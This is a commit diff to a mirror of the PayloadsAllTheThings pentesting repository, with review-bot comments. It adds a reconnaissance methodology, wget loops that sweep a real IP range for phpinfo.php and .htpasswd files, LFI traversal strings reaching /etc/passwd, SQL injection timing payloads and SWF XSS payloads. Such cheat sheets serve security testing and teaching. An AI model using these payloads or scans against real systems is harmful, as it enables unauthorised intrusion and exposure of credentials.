mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Methodology added, XSS payloads updated,little fix
parent 22e8dc091f
commit 54bf6d9a5b
1
.gitignore
vendored
Normal file
@ -0,0 +1 @@
Low_hanging_fruits.md
@ -1,29 +0,0 @@
# Collection of usefull scripts and tricks
## Dorks
Google Dork to find subdomains
```
site:*.domain.com -www
site:http://domain.com ext:php
site:http://domain.com filtype:pdf
```
## Scripts
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```
Script to detect all .htpasswd files in a range of IPs
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```
## Thanks to
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
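Review bot: this whole-file deletion is paired with the new Methodology_and_enumeration.md in the same commit, which carries the Dorks, Scripts and Thanks sections of this file almost verbatim; a `git mv` followed by the edits would have kept blame history for those sections instead of showing them as a delete plus an unrelated add. Nothing else to raise on the removed side: the `filtype:pdf` typo here is corrected to `filetype:pdf` in the new copy.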
117
Methodology_and_enumeration.md
Normal file
@ -0,0 +1,117 @@
# Methodology and Enumeration
## Bug Hunting Methodology
1. Enumerate all subdomains (only if the scope is *.domain.ext)
Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
```
git clone https://github.com/guelfoweb/knock
git clone https://github.com/danielmiessler/SecLists.git
knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
```
Using Jason Haddix's enumall Recon-ng script,
```
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS
ln -s /$recon-ng_path /usr/share/recon-ng
git clone https://github.com/jhaddix/domain.git
cd domain
./setup_enumall.sh
./enumall.py domain.com
-w to run a custom wordlist with recon-ng
-a to use alt-dns
-p to feed a custom permutations list to alt-dns (requires -a flag)
-i to feed a list of domains (can also type extra domains into the original command)
```
2. Subdomain take over using HostileSubBruteForcer
```
git clone https://github.com/nahamsec/HostileSubBruteforcer
chmox +x sub_brute.rb
./sub_brute.rb
```
3. EyeWitness and Nmap scans from the KnockPy and enumall scans
```
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
4. Basic NMAP (if allowed ^^')
```
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 &
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -T4 defines the timing for the task (options are 0-5 and higher is faster)
```
5. List all the subdirectories with DirBuster or GoBuster
```
./gobuster -u http://buffered.io/ -w words.txt -t 10
-u url
-w wordlist
-t threads
More subdomain :
./gobuster -m dns -w subdomains.txt -u google.com -i
```
6. Explore the website
```
- Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
- Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
- Explore and understand available functionality, noting areas that correspond to vulnerability types
```
7. Look for private information in GitHub repos with GitRob
```
gitrob commd
```
8. Subscribe to the site and pay for the additional functionality to test
9. Launch a Nikto scan in case you missed something
## Google Dorks
Google Dork to find subdomains
```
site:*.domain.com -www
site:http://domain.com ext:php
site:http://domain.com filetype:pdf
```
## Scripts
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```
Script to detect all .htpasswd files in a range of IPs
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```
## Thanks to
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
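Review bot: several of the commands in this new file will not run as written. `chmox +x sub_brute.rb` should be `chmod +x sub_brute.rb`; in `ln -s /$recon-ng_path /usr/share/recon-ng` the shell expands `$recon` (a variable name cannot contain `-`), so the link source becomes `/-ng_path`, and a properly named variable or `$(pwd)` is needed; `gitrob commd` is a placeholder rather than an invocation and should either show the real command line or be marked as TODO; EyeWitness is called as `./EyeWitness.py` on one line and `./EyeWitness` on the next three, so pick the script name that exists in the checkout. Presentation: the five `•` bullets explaining the nmap flags sit inside the code fence and should be moved out so they render as a list, and the fences carry no language tag. In the two wget loops the range `98.13{6..9}.{0..255}.{0..255}` is a hard-coded block belonging to a real network, not a placeholder, and the `&` after `done` backgrounds the whole loop so the script exits immediately with no output; parameterise the range (or name it clearly as an example) and decide whether the loop is meant to be backgrounded.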
@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
## Exploit
## Exploit
Basic LFI (null byte and double encoding)
Basic LFI (null byte, double encoding and other tricks)
```
```
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
```
```
LFI Wrapper rot13 and base64 - php://filter case insensitive
LFI Wrapper rot13 and base64 - php://filter case insensitive
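Review bot: the heading now promises "other tricks" but the only addition is `....//....//etc/passwd`, and nothing says what it is for; a one-line comment next to it would help readers, since the block is otherwise just a list of URLs. While in this block, the existing `%252e%252e%252f` line still stops after the encoded traversal with no target file, unlike its neighbours, and the fence has no language tag.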
@ -22,6 +22,7 @@ Last modifications :
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
* [Nikto](https://cirt.net/nikto2)
* [Nikto](https://cirt.net/nikto2)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* [Wappalyzer](https://wappalyzer.com/download)
# More resources
# More resources
Book's list:
Book's list:
@ -76,6 +76,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
MySQL Time Based
MySQL Time Based
```
```
+BENCHMARK(40000000,SHA1(1337))+
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
```
```
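Review bot: the new `'%2Bbenchmark(3200,SHA1(1))%2B'` line is the URL-encoded form of the `+BENCHMARK(...)+` line above it (`%2B` is `+`) with a very different iteration count, but nothing in the block says so; label it as the encoded variant so readers do not take the two as interchangeable, since 3200 rounds and 40000000 rounds produce delays that differ by orders of magnitude.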
@ -107,5 +108,21 @@ Polyglot injection (multicontext)
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
```
## Thanks to
## Thanks to - Other resources
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
* MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* MSQQL:
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
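Review bot: every added link in this list has a space between `]` and `(`, for example `[PentestMonkey's mySQL injection cheat sheet] (http://...)`, so Markdown renders them as literal text rather than links; remove the space on each line. `* MSQQL:` should read `* MSSQL:`. The rewrite also drops the original `sqlinjectionwiki.com` MySQL cheat-sheet link without replacing it; if that was not intended, re-add it under the MySQL bullet.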
@ -136,9 +136,18 @@ XSS in SVG (short)
```
```
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
```
```
XSS in SWF
```
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
```
more payloads in ./files
more payloads in ./files
## XSS with Relative Path Overwrite - IE 8/9 and lower
## XSS with Relative Path Overwrite - IE 8/9 and lower
You need these 3 components
You need these 3 components
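Review bot: the IE8 and IE9 lines in the new "XSS in SWF" block use typographic quotes (‘ ’) instead of ASCII `'`, so the JavaScript in the `js=` parameter is a syntax error as soon as someone copies it; replace them with straight quotes. All three examples also point at the third-party host `0me.me` rather than the `SWF_XSS.swf` this same commit adds under `./files`, so the section depends on an external site staying up; reference the local file instead. The fence has no language tag.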
BIN
XSS injection/files/SWF_XSS.swf
Normal file (379 B)
Binary file not shown.
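Review bot: a compiled SWF is committed without its ActionScript source, so nobody reviewing this change can verify what the binary does beyond what the `js=` parameter in the XSS section implies; add the source next to the binary (or link to where it lives) and note the compiler used, so the 379-byte file can be rebuilt and diffed rather than trusted as an opaque blob.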